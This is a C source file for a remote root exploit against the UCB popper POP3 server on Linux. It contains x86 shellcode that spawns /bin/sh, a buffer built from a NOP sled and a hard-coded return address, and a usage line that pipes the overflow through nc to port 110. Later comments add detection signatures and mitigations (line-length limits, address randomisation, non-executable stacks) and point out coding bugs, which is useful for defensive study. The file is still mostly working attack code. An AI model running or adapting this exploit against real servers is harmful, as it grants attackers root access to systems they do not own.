/* 
 * Remote root exploit for UCB popper on Linux 
 *
 * sk8@lucid-solutions.com
 * http://www.lucid-solutions.com
 * 
 * Usage: ( ./linux-ucb 0 ; cat ) | nc your.host.com 110
 * Try adjusting offsets by 100.
 *
 * Tested on UCB Pop server (version 1.831beta) 
 * 
 * I figure it's safe to release this since UCB is not that 
 * common anymore.  But if you are still running it on your 
 * system(s), you had better upgrade.  This program shows you 
 * why.
 * 
 */

#include        <stdio.h>
#include        <stdlib.h>
#include        <unistd.h>
#include        <sys/errno.h>

/*
 * Linux x86 shellcode: the raw payload bytes that main() copies into the
 * generated request.  The literal ends with the path string "/bin/sh".
 * strlen() is used on it in main(), so the effective payload length is
 * everything up to the literal's terminating NUL.
 *
 * Defender note: this exact byte sequence, and a "/bin/sh" string inside
 * a POP3 session (port 110, per the usage line in the file header), can
 * serve as a network or memory signature for this specific tool.
 */
char *shell=
    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
    "\xff\xff/bin/sh";


/*
 * ADDR   - hard-coded base value from which main() derives the 4-byte
 *          word it writes repeatedly into the tail of the buffer.
 *          NOTE(review): looks like an address in the stack region of a
 *          32-bit Linux process -- confirm against the tested server.
 *          A fixed value like this only works where the target's memory
 *          layout is predictable; address-space randomisation and a
 *          non-executable stack are the standard mitigations for this
 *          class of attack.
 * OFFSET - default adjustment added to the value derived from ADDR; can
 *          be overridden by the single command-line argument.
 * BUFLEN - total size in bytes of the generated line.
 */
#define ADDR 0xbffff1d8 
#define OFFSET 0
#define BUFLEN 1100

/* Output buffer; every byte of it is overwritten in main(). */
char    buffer[BUFLEN];
/* Current adjustment, initialised to OFFSET and replaced by argv[1] if given. */
int     offset=OFFSET;


/*
 * Build one oversized BUFLEN-byte input line and print it on stdout.
 * Per the usage line in the file header, the output is meant to be piped
 * to a POP3 service on port 110.
 *
 * argv[1] (optional) - integer adjustment stored in `offset`.
 *
 * The vulnerable server code is not shown in this file; from the layout
 * of the line this presumably targets an unbounded copy of the command
 * line into a fixed-size stack buffer -- confirm against the server
 * source.
 *
 * Defender notes:
 *  - The generated line is at least BUFLEN (1100) bytes and is sent
 *    without any prior POP3 command, whereas legitimate POP3 command
 *    lines are short.  Enforcing a bounded line length in the server or
 *    at a proxy rejects this input.
 *  - Roughly the first 900 bytes are 0x90 filler, so a long run of 0x90
 *    in traffic to port 110 is a usable detection signal.
 *  - The file header's own advice applies: upgrade or replace the
 *    affected server.
 *
 * NOTE(review): memset/memcpy/strlen are used but <string.h> is not in
 * the visible include block.
 */
int main (int argc, char *argv[]) {
        int i;

        /* More than one argument: print usage and exit (with status 0). */
        if(argc > 2) {
                printf("Usage: %s [offset]\n",argv[0]);
                exit(0);
        }
        /* atoi() does no error checking; non-numeric input yields 0. */
        if(argc==2)
                offset=atoi(argv[1]);

        /* Set up the buffer */
        /* Fill the whole buffer with the byte 0x90. */
        memset(buffer,0x90,BUFLEN);
        /* Place the payload so that it ends 200 bytes before the end of the buffer. */
        memcpy(buffer+BUFLEN-200-strlen(shell),shell,strlen(shell));
        /*
         * Fill the tail (from index BUFLEN-200+1 up to below BUFLEN-4) with
         * the same 4-byte value, ADDR-BUFLEN+100+offset, repeated every 4 bytes.
         * The stores go through an int* cast at byte offsets that are not
         * multiples of 4.
         */
        for(i=BUFLEN-200+1;i<BUFLEN-4;i+=4) 
                *(int *)&buffer[i]=ADDR-BUFLEN+100+offset; 
        /* The last byte is a newline, terminating the line sent to the server. */
        buffer[BUFLEN-1]='\n';

        /*
         * NOTE(review): buffer is never NUL-terminated inside its BUFLEN
         * bytes, so "%s" reads past the end of the array (undefined
         * behaviour); the bytes actually emitted may extend beyond BUFLEN.
         */
	printf("%s\n", buffer); 
}
